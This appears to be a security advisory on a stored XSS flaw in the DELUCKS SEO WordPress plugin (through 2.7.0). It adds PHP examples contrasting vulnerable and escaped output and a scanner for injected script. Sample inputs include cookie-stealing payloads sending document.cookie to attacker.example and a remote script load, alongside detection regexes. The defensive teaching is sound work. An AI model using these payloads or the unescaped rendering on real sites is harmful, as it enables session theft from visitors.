Impact
Stored Cross‑Site Scripting (XSS) occurs when user input is persisted without proper neutralization and later emitted into a web page, so that an attacker's script runs in the browser of everyone who views that page. In this case, the DELUCKS SEO plugin for WordPress does not escape data it stores before rendering it, allowing stored XSS. An attacker who can submit input to the plugin can have a malicious script executed in the browser of any visitor to an affected page, which may lead to session hijacking, credential theft, defacement, or delivery of further malware. The weakness is classified as CWE‑79 (Improper Neutralization of Input During Web Page Generation).
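The pattern described above, as an added example that is not code from the DELUCKS SEO plugin or the advisory: a minimal WordPress-style settings flow that stores one text field and renders it, first unescaped (the CWE‑79 defect) and then escaped for the output context. The option name, field contents, function names and the `<meta>`/`<h1>` markup are assumptions for illustration; the stand-in definitions of `esc_html()`, `esc_attr()` and `sanitize_text_field()` are simplified versions of the WordPress functions so the file runs under the `php` CLI without WordPress loaded.

```php
<?php
// Added example, not the plugin's own code. Shows the stored-XSS defect and
// the hardened equivalent in a WordPress-style settings flow.
//
// Stand-ins so the file runs stand-alone. Inside WordPress these functions
// already exist and the stand-ins are skipped. They are simplified: the real
// sanitize_text_field() also strips script/style content and normalises
// whitespace.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        $str = strip_tags((string) $str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}

// Constructed attacker input, as it would arrive from a settings form field.
$submitted = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

// --- Vulnerable flow (CWE-79): persisted as-is, rendered without escaping ---
function save_option_vulnerable(array &$options, $value) {
    $options['seo_title'] = $value;                 // no sanitisation on save
}
function render_vulnerable(array $options) {
    // Raw interpolation into an attribute: the quote closes the attribute and
    // the stored <script> element is delivered to every visitor.
    return '<meta name="title" content="' . $options['seo_title'] . '">';
}

// --- Hardened flow: sanitise on save, escape for each output context -------
function save_option_hardened(array &$options, $value) {
    $options['seo_title'] = sanitize_text_field($value); // defence in depth
}
function render_hardened(array $options) {
    // The essential fix is escaping at output, chosen per context:
    // esc_attr() inside attribute values, esc_html() inside text nodes.
    return '<meta name="title" content="' . esc_attr($options['seo_title']) . '">'
         . "\n" . '<h1>' . esc_html($options['seo_title']) . '</h1>';
}

$options_vuln = [];
$options_safe = [];
save_option_vulnerable($options_vuln, $submitted);
save_option_hardened($options_safe, $submitted);

echo "Vulnerable output:\n", render_vulnerable($options_vuln), "\n\n";
echo "Hardened output:\n", render_hardened($options_safe), "\n";
```

Escaping at output is the fix that closes the hole; sanitising on save is defence in depth, because a stored value is often rendered in more than one context (attribute, text node, JavaScript string) and each needs its own escaping function.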
Affected Systems
Any installation of the DELUCKS SEO plugin for WordPress up to and including version 2.7.0 is affected, regardless of the WordPress core version. The issue applies to every release from the plugin's first version through 2.7.0.
Risk and Exploitability
The CVSS base score of 6.5 (Medium) indicates a moderate impact on confidentiality, integrity, and availability. The EPSS score of under 1% suggests that exploitation in the wild is currently rare, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The likely attack path is to enter a payload through the plugin's administrative settings or other data‑entry fields; the stored value is later rendered on the front end without escaping. Because the payload is stored, it persists and fires every time an affected page is viewed, until the stored value is removed. Detection is therefore best done on the stored data rather than in visitors' browsers: review the plugin's settings and any content it writes for script tags, event‑handler attributes or javascript: URLs, and check for unexpected changes to those settings. A Content Security Policy that disallows inline script limits what an injected payload can do but does not replace escaping.
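The "monitoring for script injections" above, made concrete as an added example that is not part of the advisory or the plugin: a scan over stored WordPress option values for indicators of injected script. The sample rows are constructed and the option names are invented (they are not the plugin's real keys); in a live check the rows would come from `wp_options` via `$wpdb`, as noted in the comment.

```php
<?php
// Added example, not the plugin's own code: scan stored values for script
// injection indicators. Sample rows are constructed for this example.

// Indicators that should not appear in plugin settings or SEO text fields.
// Each entry: [label, regex]. Case-insensitive; whitespace variants tolerated.
const XSS_INDICATORS = [
    ['script tag',        '/<\s*script\b/i'],
    ['event handler',     '/\bon[a-z]+\s*=/i'],
    ['javascript: URL',   '/javascript\s*:/i'],
    ['data:text/html',    '/data\s*:\s*text\/html/i'],
    ['iframe/object',     '/<\s*(iframe|object|embed)\b/i'],
];

/**
 * Return the indicator labels matched by $value. The value is checked raw
 * and after one round of HTML-entity decoding, so an entity-encoded payload
 * that a later decode step would release is flagged as well.
 */
function scan_value(string $value): array {
    $hits = [];
    $variants = [$value, html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')];
    foreach (XSS_INDICATORS as [$label, $re]) {
        foreach ($variants as $v) {
            if (preg_match($re, $v)) { $hits[] = $label; break; }
        }
    }
    return $hits;
}

/** Scan rows of option_name => option_value; return only suspicious rows. */
function scan_options(array $rows): array {
    $findings = [];
    foreach ($rows as $name => $value) {
        $hits = scan_value((string) $value);
        if ($hits) { $findings[$name] = $hits; }
    }
    return $findings;
}

// Constructed sample rows. In WordPress they would be fetched with, e.g.:
//   $wpdb->get_results("SELECT option_name, option_value FROM {$wpdb->options}", ARRAY_A)
// Option names below are invented for the example.
$rows = [
    'seo_site_title'  => 'Example Shop - Quality Goods',
    'seo_description' => 'Hand-made goods shipped worldwide. <b>Free</b> returns.',
    'seo_og_image'    => 'https://example.com/og.png" onerror="fetch(\'//attacker.example/\'+document.cookie)',
    'seo_footer_text' => '&lt;script src=&quot;https://attacker.example/x.js&quot;&gt;&lt;/script&gt;',
    'seo_canonical'   => 'javascript:alert(document.domain)',
];

foreach (scan_options($rows) as $name => $hits) {
    printf("%-16s %s\n", $name, implode(', ', $hits));
}
```

The scan is a heuristic: harmless formatting such as `<b>` is not flagged, while the attribute breakout, the entity-encoded script element and the javascript: URL each are. A hit is a lead to inspect, not proof of compromise, and a clean scan says nothing about payloads stored outside `wp_options` (post meta, custom tables), so extend the query to wherever the plugin writes.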